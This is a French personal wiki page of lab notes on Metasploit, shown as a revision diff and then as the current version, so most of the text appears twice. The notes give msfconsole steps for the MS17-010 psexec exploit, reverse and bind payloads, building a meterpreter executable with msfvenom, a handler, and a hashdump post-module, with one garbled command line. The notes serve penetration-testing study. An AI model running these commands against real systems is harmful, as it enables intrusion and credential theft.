« Metasploit » : différence entre les versions

De Justine's wiki
Aller à la navigation Aller à la recherche
Aucun résumé des modifications
Aucun résumé des modifications
 
(7 versions intermédiaires par la même utilisatrice non affichées)
Ligne 1 : Ligne 1 :
[[Category:securite]]
= Liens =
Ajouter un module (exploit) : https://medium.com/@pentest_it/how-to-add-a-module-to-metasploit-from-exploit-db-d389c2a33f6d
! Ca ne marche qu'avec du ruby, donc .rb


= Metasploit =
= Présentation =


Metasploit est un framework qui sert à réaliser des exploits sur une machine.
https://www.metasploit.com/


Il se lance avec <font face="FreeMono, monospace">msfconsole</font>. Une fois fait, je peux chercher une vulnérabilité (que j’aurais par exemple trouvée avec <font face="FreeMono, monospace">nmap --script vuln</font>) avec la commande search&nbsp;: par exemple <font face="FreeMono, monospace">search ms17-010</font>. Les exploits ont un rang de 1 à 7, plus il est haut mieux c’est. Je peux aussi chercher une date&nbsp;: <font face="FreeMono, monospace">search 2018</font>. Une fois l’exploit trouvé, metaploit affiche son chemin&nbsp;: <font face="FreeMono, monospace">exploit/windows/smb/ms17_010_</font><font face="FreeMono, monospace">psexec</font>. Les exploits peuvent aussi être rangés non par numéro de correctif microsoft, mais CVE ou BID.
Metasploit est un framework servant à réaliser des tests de pénétration. Il se base sur des "exploits", c'est-à-dire des failles de vulnérabilités, ainsi que sur des "payloads" (des charges de code à exécuter en utilisant les failles trouvées).


Je peux ensuite l’utiliser&nbsp;:
&nbsp;


<font face="FreeMono, monospace">use exploit/windows/smb/ms17_010_psexec</font>
Il se lance avec msfconsole. Une fois fait, je peux chercher une vulnérabilité (que j’aurais par exemple trouvée avec nmap --script vuln) avec la commande search&nbsp;: par exemple search ms17-010. Les exploits ont un rang de 1 à 7, plus il est haut mieux c’est. Je peux aussi chercher une date&nbsp;: search 2018. Une fois l’exploit trouvé, metaploit affiche son chemin&nbsp;: exploit/windows/smb/ms17_010_psexec. Les exploits peuvent aussi être rangés non par numéro de correctif microsoft, mais CVE ou BID.
 
Je peux ensuite l’utiliser avec use.


Me voilà «&nbsp;dans&nbsp;» l’exploit.
Me voilà «&nbsp;dans&nbsp;» l’exploit.


Je peux voir les payloads compatibles&nbsp;: <font face="FreeMono, monospace">show payloads.</font>
Je peux voir les payloads compatibles&nbsp;: show payloads.


Je la choisit avec <font face="FreeMono, monospace">set payload windows/x64/vncinject/reverse_tcp</font>
Je la choisit avec set payload windows/x64/vncinject/reverse_tcp


Puis les options à adapter à ma charge&nbsp;: <font face="FreeMono, monospace">show option</font>s
Puis les options à adapter à ma charge&nbsp;: show options


Je vois les options requises (required) et parmi celles-ci lesquelles ne sont pas configurées, ici RHOST (Remote Host). Je fais donc <font face="FreeMono, monospace">set RHOST 10.0.0.9</font>
Je vois les options requises (required) et parmi celles-ci lesquelles ne sont pas configurées, ici RHOST (Remote Host). Je fais donc set RHOST 10.0.0.9


Voire même un set <font face="FreeMono, monospace">LHOST 10.0.0.8</font> pour bien donner mon adresse (Local Host).
Voire même un set LHOST 10.0.0.8 pour bien donner mon adresse (Local Host).


Je peux revérifier les options.
Je peux revérifier les options.


On lance avec la commande <font face="FreeMono, monospace">exploit</font>.
On lance avec la commande exploit.


Parmi tous les types de charge, on a les charges en bind (ou l’attaquant se connecte) et les charges reverse (ou la machine cible se connecte à l’attaquant). Meterpreter est un shell assez avancé et discret. VNC un bureau à distance. Etc.
Parmi tous les types de charge, on a les charges en bind (ou l’attaquant se connecte) et les charges reverse (ou la machine cible se connecte à l’attaquant). Meterpreter est un shell assez avancé et discret. VNC un bureau à distance. Etc.


MSFVENOM
== MSFVENOM ==


Sert à générer des payloads&nbsp;: du code a éxecuter sur la victime.<br/> exemple&nbsp;: msfvenom -p windows/meterpreter/bind_tcp LHOST=10.0.0.8 -f exe -o payload.exe
Sert à générer des payloads&nbsp;: du code a éxecuter sur la victime.<br/> exemple&nbsp;: msfvenom -p windows/meterpreter/bind_tcp LHOST=10.0.0.8 -f exe -o payload.exe


va génerér mon payload (-p) bind_tcp… LHOSt est l’adresse de l’attaquant, -f le format, -o le nom.<br/> Une fois ceci fait, si je vais dans msfconsole et exécute un handler en faisant&nbsp;:<br/> <font face="FreeMono, monospace">use exploit/multi/handler<br/> set payload windows/meterpreter/bind_tcp<br/> [configurer les options…]<br/> exploit -j</font>
va génerér mon payload (-p) bind_tcp… LHOSt est l’adresse de l’attaquant, -f le format, -o le nom.<br/> Une fois ceci fait, si je vais dans msfconsole et exécute un handler en faisant&nbsp;:<br/> use exploit/multi/handler<br/> set payload windows/meterpreter/bind_tcp<br/> [configurer les options…]<br/> exploit -j
 
Je n’ai plus qu’à lancer le payload sur ma victime windows. si je vérifie que le handler est bien lancé, j’aurais un message du type «&nbsp;session opened&nbsp;». je pourrais ensuite utiliser la commande sessions pour la voir, sessions <numero> pour l’utiliser… ctrl+z pour la repasser en background.
 
On peut aussi upgrader un shell normal en meterpreter:
 
sessions 1 -u #Metasploit utilise pour ça un reverse shell en tcp, de façon automatique.
 
Meterpreter&nbsp;:<br/> En plus de toutes les commandes que je peux voir avec help, meterpreter utilise les scripts de la catégorie post, avec la commande run. Par exemple&nbsp;:run postuse exploit/windows/smb/ms17_010_psexec/linux/gather/hashdump.
 
&nbsp;
 
OUTIL A VOIR&nbsp;: EvilGinx


<span style="font-size:medium"><font face="Liberation Serif, serif">Je n’ai plus qu’à lancer le payload sur ma victime windows. si je vérifie que le handler est bien lancé, j’aurais un message du type «&nbsp;session opened&nbsp;». je pourrais ensuite utiliser la commande sessions pour la voir, sessions <numero> pour l’utiliser… ctrl+z pour la repasser en background.</font></span>
&nbsp;


<span style="font-size:medium"><font face="Liberation Serif, serif">On peut aussi upgrader un shell normal en meterpreter:</font></span>
== Searchsploit ==


<kbd><span style="font-size:medium"><font face="Liberation Serif, serif">sessions 1 -u #Metasploit utilise pour ça un reverse shell en tcp, de façon automatique.</font></span></kbd>
Moteur de recherche d'exploit, inclus avec kali. Simple à utiliser :


Meterpreter&nbsp;:<br/> En plus de toutes les commandes que je peux voir avec help, meterpreter utilise les scripts de la catégorie post, avec la commande run. Par exemple&nbsp;:<font face="FreeMono, monospace">run post/linux/gather/hashdump.</font>
root@kali-squi:~/Documents/NOtes - HTB# searchsploit cms made simple

Dernière version du 22 juin 2022 à 12:00

Liens

Ajouter un module (exploit) : https://medium.com/@pentest_it/how-to-add-a-module-to-metasploit-from-exploit-db-d389c2a33f6d ! Ca ne marche qu'avec du ruby, donc .rb

Présentation

https://www.metasploit.com/

Metasploit est un framework servant à réaliser des tests de pénétration. Il se base sur des "exploits", c'est-à-dire des failles de vulnérabilités, ainsi que sur des "payloads" (des charges de code à exécuter en utilisant les failles trouvées).

 

Il se lance avec msfconsole. Une fois fait, je peux chercher une vulnérabilité (que j’aurais par exemple trouvée avec nmap --script vuln) avec la commande search : par exemple search ms17-010. Les exploits ont un rang de 1 à 7, plus il est haut mieux c’est. Je peux aussi chercher une date : search 2018. Une fois l’exploit trouvé, metaploit affiche son chemin : exploit/windows/smb/ms17_010_psexec. Les exploits peuvent aussi être rangés non par numéro de correctif microsoft, mais CVE ou BID.

Je peux ensuite l’utiliser avec use.

Me voilà « dans » l’exploit.

Je peux voir les payloads compatibles : show payloads.

Je la choisit avec set payload windows/x64/vncinject/reverse_tcp

Puis les options à adapter à ma charge : show options

Je vois les options requises (required) et parmi celles-ci lesquelles ne sont pas configurées, ici RHOST (Remote Host). Je fais donc set RHOST 10.0.0.9

Voire même un set LHOST 10.0.0.8 pour bien donner mon adresse (Local Host).

Je peux revérifier les options.

On lance avec la commande exploit.

Parmi tous les types de charge, on a les charges en bind (ou l’attaquant se connecte) et les charges reverse (ou la machine cible se connecte à l’attaquant). Meterpreter est un shell assez avancé et discret. VNC un bureau à distance. Etc.

MSFVENOM

Sert à générer des payloads : du code a éxecuter sur la victime.
exemple : msfvenom -p windows/meterpreter/bind_tcp LHOST=10.0.0.8 -f exe -o payload.exe

va génerér mon payload (-p) bind_tcp… LHOSt est l’adresse de l’attaquant, -f le format, -o le nom.
Une fois ceci fait, si je vais dans msfconsole et exécute un handler en faisant :
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
[configurer les options…]
exploit -j

Je n’ai plus qu’à lancer le payload sur ma victime windows. si je vérifie que le handler est bien lancé, j’aurais un message du type « session opened ». je pourrais ensuite utiliser la commande sessions pour la voir, sessions <numero> pour l’utiliser… ctrl+z pour la repasser en background.

On peut aussi upgrader un shell normal en meterpreter:

sessions 1 -u #Metasploit utilise pour ça un reverse shell en tcp, de façon automatique.

Meterpreter :
En plus de toutes les commandes que je peux voir avec help, meterpreter utilise les scripts de la catégorie post, avec la commande run. Par exemple :run postuse exploit/windows/smb/ms17_010_psexec/linux/gather/hashdump.

 

OUTIL A VOIR : EvilGinx

 

Searchsploit

Moteur de recherche d'exploit, inclus avec kali. Simple à utiliser :

root@kali-squi:~/Documents/NOtes - HTB# searchsploit cms made simple